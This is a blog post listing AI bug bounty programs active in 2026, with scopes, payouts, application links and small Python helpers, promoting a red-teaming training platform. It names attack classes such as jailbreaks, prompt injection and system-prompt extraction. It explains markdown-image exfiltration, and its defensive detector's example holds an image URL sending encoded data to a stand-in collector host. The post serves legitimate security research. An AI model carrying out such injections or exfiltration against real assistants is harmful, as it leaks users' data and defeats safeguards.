AI Bug Bounty Programs in 2026: Active List with Payouts

8 min read·By Anthony D'Onofrio·Updated 2026-05-15

Every active AI bug bounty program in 2026: OpenAI ($100K max), Anthropic, Google, Microsoft, xAI/Grok, Cohere, Mozilla 0din, Gray Swan Arena. Verified scopes, payout ranges, and application links.

The AI security skill stack is now monetizable in ways it wasn't 18 months ago. Multiple major labs and platforms run dedicated AI bug bounty programs in 2026, with payouts ranging from $200 for entry-level findings to $100,000 for exceptional discoveries. The programs collectively paid out tens of millions of dollars in 2025, and 2026 budgets are larger.

This page is a living reference. Each program below was verified active as of the update date shown above (2026-05-15). If you spot an outdated entry, email anthony@harbinger.partners and I'll fix it.

How AI bounty programs differ from traditional infosec bounties

Three things are worth understanding before you submit anywhere:

Different vulnerability classes. AI programs reward findings around jailbreaks, prompt injection, agentic-system risks, model-extraction, training-data exfiltration, alignment failures, and content-policy bypasses. Most don't pay for traditional infrastructure bugs (those go through the company's regular VDP or web bounty).
Some programs are open; some are application-only. Mozilla's 0din, OpenAI's Bugcrowd-hosted programs, and Anthropic's HackerOne program accept open submissions. xAI accepts reports via email. Read the entry policy before investing time on a finding.
Scope exclusions matter. Several programs explicitly exclude what most people think of as "AI hacking." Google's AI VRP excludes prompt injection and jailbreaks. Reading scope first saves wasted submissions.
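The scope-first habit can be turned into a quick pre-submission check. The sketch below is a minimal Python illustration, not an official tool. The scope notes are transcribed from the program entries on this page as of its verification date, the finding-class labels are simplified names chosen for the example, and `Program` and `triage` are hypothetical helpers. Treat the result as a prompt to go read the live policy, not as a ruling.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Program:
    name: str
    in_scope: frozenset = frozenset()      # classes the page lists as rewarded
    out_of_scope: frozenset = frozenset()  # classes the page lists as excluded


# Transcribed from this page (assumption: still accurate when you read it).
PROGRAMS = [
    Program("0din", in_scope=frozenset(
        {"prompt injection", "jailbreak", "training data leakage", "denial of service"})),
    Program("Anthropic (Model Safety)", in_scope=frozenset({"universal jailbreak"})),
    Program("Google AI VRP", out_of_scope=frozenset(
        {"prompt injection", "jailbreak", "alignment issue"})),
    Program("xAI", in_scope=frozenset({"prompt injection", "unauthorized data access"})),
]


def triage(finding_class: str) -> dict[str, str]:
    """Label each program as excluded, listed, or unclear for one finding class."""
    result = {}
    for program in PROGRAMS:
        if finding_class in program.out_of_scope:
            result[program.name] = "excluded"
        elif finding_class in program.in_scope:
            result[program.name] = "listed"
        else:
            result[program.name] = "unclear, read the policy"
    return result


for name, verdict in triage("prompt injection").items():
    print(f"{name}: {verdict}")
```

Anything that comes back "unclear" is the case where reading the full policy matters most, since a class that is not named in a scope summary may still be excluded in the fine print.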

Dedicated LLM-specific programs

0din (Mozilla)

Mozilla's 0day Investigative Network is the most explicitly LLM-focused bounty program in operation. Launched in mid-2024, it incentivizes findings across security boundaries that fall outside other bounty programs.

Scope. Prompt injection, guardrail jailbreaks, training data leakage, denial of service, OWASP LLM Top 10 categories.
Payouts. $500 to $15,000, discretionary, evaluated by the 0DIN team based on impact, report quality, and timing.
Process. Submit a high-level abstract first; 0din responds within three business days with a scope decision and likely payout range. Full PoC submission follows.
Where to apply. 0din.ai

If you're new to AI bounty work, this is the lowest-friction starting point. The scope is broad, the process is open, and the LLM-specific framing means your skill stack maps directly to what the program rewards.

OpenAI Safety Bug Bounty

OpenAI launched its dedicated Safety Bug Bounty Program in March 2026 with a $1 million annual pool. Run via Bugcrowd. Distinct from OpenAI's longer-running Security Bug Bounty.

Scope. AI-specific scenarios, agentic risks (including MCP), exposure of OpenAI proprietary information, account and platform integrity. Out of scope: general content-policy bypasses without demonstrable safety or abuse impact ("jailbreaks that result in rude language"), and prompts that surface easily-findable public information.
Payouts. Up to $20,000 standard. Maximum payout raised to $100,000 for exceptional and differentiated critical findings.
Where to apply. bugcrowd.com/openai

OpenAI Security Bug Bounty (separate program)

The traditional infrastructure-style program. Same Bugcrowd page, different scope.

Scope. Traditional vulnerabilities in OpenAI's infrastructure and APIs.
Payouts. $200 to $20,000, with up to $100,000 for exceptional findings.

OpenAI GPT-5.5 Bio Bounty (specialized)

A focused program for one specific objective: a single universal jailbreaking prompt that successfully answers all five bio safety questions from a clean chat session without prompting moderation. Worth a separate listing because the scope and reward structure are unusual.

Where to apply. openai.smapply.org

Anthropic Bug Bounty Program

Anthropic's program went public on HackerOne in May 2026. Previously application-only with NDA; now accepts open submissions across two tracks.

Scope (Model Safety track). Novel, universal jailbreak attacks against Claude's Constitutional Classifiers, focused on critical high-risk domains (chemical, biological, radiological, nuclear, cybersecurity). A "universal jailbreak" is one that consistently bypasses safety measures across many topics.
Scope (Product Security track). Security vulnerabilities in Anthropic products including Claude.ai, the Claude API, and Claude Code. Claude Code scope covers critical issues: unauthorized command execution, invisible tool usage, permission bypasses, and sandbox escapes.
Payouts. Up to $15,000 per finding for both tracks.
Where to apply. hackerone.com/anthropic

Anthropic Vulnerability Disclosure Program (VDP)

Separate from the Bug Bounty Program above. Covers traditional infrastructure issues (CSRF, privilege escalation, SQL injection, XSS, directory traversal). Recognition-only, no monetary reward.

Where to submit. hackerone.com/anthropic-vdp

Google AI Vulnerability Reward Program (AI VRP)

Google runs a dedicated AI VRP that reads as a complement to its broader VRP, not a replacement. Important scope caveat below.

Scope. Flagship products: Google Search, Gemini Apps (Web, Android, iOS), Google Workspace core (Gmail, Drive, Meet, Calendar, Docs, Sheets, Slides, Forms). Standard coverage extends to AI Studio, Jules, and non-core Workspace.
Payouts. Up to $20,000 base; bonuses for report quality and novelty raise the cap to $30,000. Sensitive data exfiltration: up to $15,000. Phishing enablement and model theft: up to $5,000.
Out of scope. Prompt injection, jailbreaks, and alignment issues are explicitly excluded. This is the single most important rule to understand: a high-quality jailbreak finding earns nothing here. Reserve those submissions for 0din, OpenAI Safety, or Anthropic.
Where to apply. bughunters.google.com

Microsoft Copilot Bug Bounty

Microsoft's Copilot Bounty covers AI experiences in their consumer Copilot product line. Updated April 2026 to integrate moderate-severity submissions.

Scope. Copilot consumer products: copilot.microsoft.com, copilot.ai, Copilot for Telegram, Copilot for WhatsApp, Microsoft Copilot Application (iOS / Android), Copilot in Microsoft Edge (Windows), Bing generative search in Browser.
Payouts. $250 to $30,000. Critical flaws allowing inference manipulation hit the cap. Moderate-severity findings now qualify for awards up to $5,000.
Out of scope. Training, documentation, samples, community forum sites.
Where to apply. msrc.microsoft.com/bounty-ai

xAI (Grok)

xAI runs a bug bounty program through HackerOne covering Grok and AI features across the X platform. Also accepts reports via email at vulnerabilities@x.ai.

Scope. Security vulnerabilities in Grok models, Grok integrations on X (web and mobile), and the xAI API. Includes prompt injection, unauthorized data access, and authentication/authorization flaws in AI-powered features.
Payouts. Payout tiers are not publicly documented. Reports are triaged by HackerOne with xAI's security team.
Where to submit. hackerone.com/x or email vulnerabilities@x.ai

Cohere

Cohere maintains a vulnerability disclosure program through its Trust Center. Covers the Cohere platform, Command models, and enterprise API endpoints. Annual third-party security audits supplement the program.

Scope. Security vulnerabilities in Cohere's platform and APIs. Includes model-level issues and infrastructure bugs.
Payouts. Not publicly documented. Contact via the Trust Center for details.
Where to submit. trustcenter.cohere.com

Competition-format programs

These pay differently than bounties: prize pools split among top finishers in time-bound events. Worth knowing because the audience and skill bar are similar.

Gray Swan Arena

Time-bound red-team competitions on (anonymized) frontier models, sponsored by AI labs and governments.

Format. Wave-based seasons. Multiple concurrent challenges across categories: Safeguards, Indirect Prompt Injection, Agent Red-Teaming, Machine-in-the-Middle.
Prize pools. $40,000 to $300,000+ per challenge. Past sponsors include OpenAI, Anthropic, Google DeepMind, UK AISI.
Bonus opportunity. Top 40 overall participants get invited to Gray Swan's private red-teaming network for paid engagement opportunities.
Where to compete. app.grayswan.ai/arena

HackAPrompt

Annual large-scale prompt-injection competition. Prize pools historically $40,000+. Format and exact payouts vary year to year.

Aggregator platforms

Several of the programs above are hosted on one of two platforms. Worth tracking both because new programs land here first.

HackerOne

Hosts Anthropic's bounties (now public), xAI, Google's VRP intake for some programs, and a long tail of company-specific AI programs. Search "AI" or "LLM" on the platform's program directory for the current list.

Bugcrowd

Hosts OpenAI's programs. Smaller AI footprint than HackerOne, but the OpenAI relationship alone makes it worth tracking.

How to choose where to start

If you're new to AI bug bounty work, this is the order of operations that has worked for the people I've seen come up the curve fastest:

Start with 0din. Lowest friction, broadest LLM scope, open submissions. First payout teaches the report format.
Compete in HackAPrompt or Gray Swan Arena. Time-bound events force iteration speed. Top placements become resume material that gets you accepted into the application-only programs.
Submit to Anthropic and the OpenAI Safety Bug Bounty once you have at least one paid 0din finding or a Gray Swan placement to cite. Anthropic's program is now open on HackerOne (no longer requires application + NDA). Track record still helps your reports get prioritized.
Target Microsoft Copilot, Google AI VRP, and xAI when you want to apply traditional vulnerability skills to AI surfaces. The published caps at Microsoft and Google ($30,000) are higher than 0din's or Anthropic's ($15,000), the scopes are stricter, and the findings tend to look more like classic web/infrastructure bugs. xAI does not publish its payout tiers.

The single biggest mistake I see new researchers make: submitting prompt-injection findings to Google's AI VRP, which explicitly excludes them. Read the scope first, every time.
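When weighing programs against each other, it can help to put the published payout figures side by side. The following is a rough Python sketch using only the numbers quoted on this page. The `Payout` tuple and `by_top_cap` helper are hypothetical names for illustration, `top_cap` folds "exceptional finding" ceilings and bonus-inclusive caps into one field as a simplification, and none of this says anything about typical or median awards.

```python
from typing import NamedTuple, Optional


class Payout(NamedTuple):
    program: str
    low: Optional[int]           # published floor in USD, None if not stated
    standard_cap: Optional[int]  # published standard ceiling, None if not stated
    top_cap: Optional[int] = None  # exceptional or bonus-inclusive ceiling, if any


# Figures as quoted on this page (assumption: unchanged since verification).
PAYOUTS = [
    Payout("0din", 500, 15_000),
    Payout("OpenAI Safety Bug Bounty", None, 20_000, 100_000),
    Payout("OpenAI Security Bug Bounty", 200, 20_000, 100_000),
    Payout("Anthropic Bug Bounty", None, 15_000),
    Payout("Google AI VRP", None, 20_000, 30_000),
    Payout("Microsoft Copilot", 250, 30_000),
    Payout("xAI", None, None),
    Payout("Cohere", None, None),
]


def by_top_cap(payouts):
    """Split programs into those with a published cap (sorted high to low) and the rest."""
    documented = [p for p in payouts if p.standard_cap is not None]
    undocumented = [p.program for p in payouts if p.standard_cap is None]
    ranked = sorted(
        documented,
        key=lambda p: max(p.standard_cap, p.top_cap or 0),
        reverse=True,
    )
    return ranked, undocumented


ranked, undocumented = by_top_cap(PAYOUTS)
for p in ranked:
    print(f"{p.program}: up to ${max(p.standard_cap, p.top_cap or 0):,}")
print("No published tiers:", ", ".join(undocumented))
```

A ceiling is not a forecast. Scope fit, as described above, usually matters more than the headline number when deciding where a given finding should go.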

Where Wraith fits in this stack

If you're building the skill from scratch, Wraith Academy is structured around exactly the categories these programs pay for. The audit-framing primitive Mira Ulvov tests is the same primitive Anthropic's Constitutional Classifiers are designed to resist. The markdown-image exfiltration the Cartographer of Hollow Marches teaches is the exact attack class that earns 0din and Microsoft Copilot payouts. The system-prompt extraction Pyromos rewards is the foundational skill behind every chained jailbreak finding.
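For readers who have not met the markdown-image exfiltration class before, a defensive sketch may make the shape concrete. The usual pattern is that injected instructions get a model to emit a markdown image whose URL carries data, and the chat client then fetches that URL when it renders the image. The Python below is an illustrative detector only: the `suspicious_images` function, the allowlist approach, and the example hosts are assumptions for this sketch, not something any program above prescribes, and it only checks query strings even though data can also travel in the URL path.

```python
import re
from urllib.parse import urlparse

# Matches markdown images of the form ![alt](http...) and captures the URL.
IMAGE_RE = re.compile(r"!\[[^\]]*\]\((https?://[^\s)]+)")


def suspicious_images(model_output: str, allowed_hosts: set[str]) -> list[str]:
    """Return image URLs that point off-allowlist and carry a query string."""
    flagged = []
    for url in IMAGE_RE.findall(model_output):
        parts = urlparse(url)
        # A query string on an unexpected host is a cheap signal that the
        # image request could be smuggling data out when the client renders it.
        if parts.hostname not in allowed_hosts and parts.query:
            flagged.append(url)
    return flagged


output = (
    "Done. ![status](https://collector.example/p.png?d=c2VjcmV0) "
    "and ![logo](https://cdn.example.com/logo.png)"
)
print(suspicious_images(output, {"cdn.example.com"}))
```

A report in this class typically has to show the other direction: that untrusted content can cause such an image to be emitted and rendered, which is where the program scopes above come in.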

The WCAP credential is the cert designed for this market: it tests the exact attack categories these bounty programs pay for, in a graded format. Pass WCAP, get listed in the public credentials registry, then go submit.

If you want to start training: Academy is free. If you want to know what to attack first: Mira Ulvov, the Memory Smuggler and the Memory Poisoning pillar cover the highest-value modern category. If you want the full reference for AI security categories these programs reward, the OWASP LLM Top 10 annotated walkthrough maps each category to the relevant bounty scopes.

Last updated

Verified: 2026-05-15. Programs change scope and payout structure regularly.

The State of LLM Bug Bounties in 2026 — the companion analysis: which attack classes actually pay, median payouts vs. advertised ceilings, and how to pick a program that fits your hunting style.
Prompt Injection: A Complete Guide — the foundational attack class behind most AI bounty findings.
System Prompt Extraction guide — extraction that reveals embedded secrets is one of the highest-paying categories across programs.
Data Exfiltration via Markdown Images — the quiet exfil channel that earns 0din and Microsoft Copilot payouts.
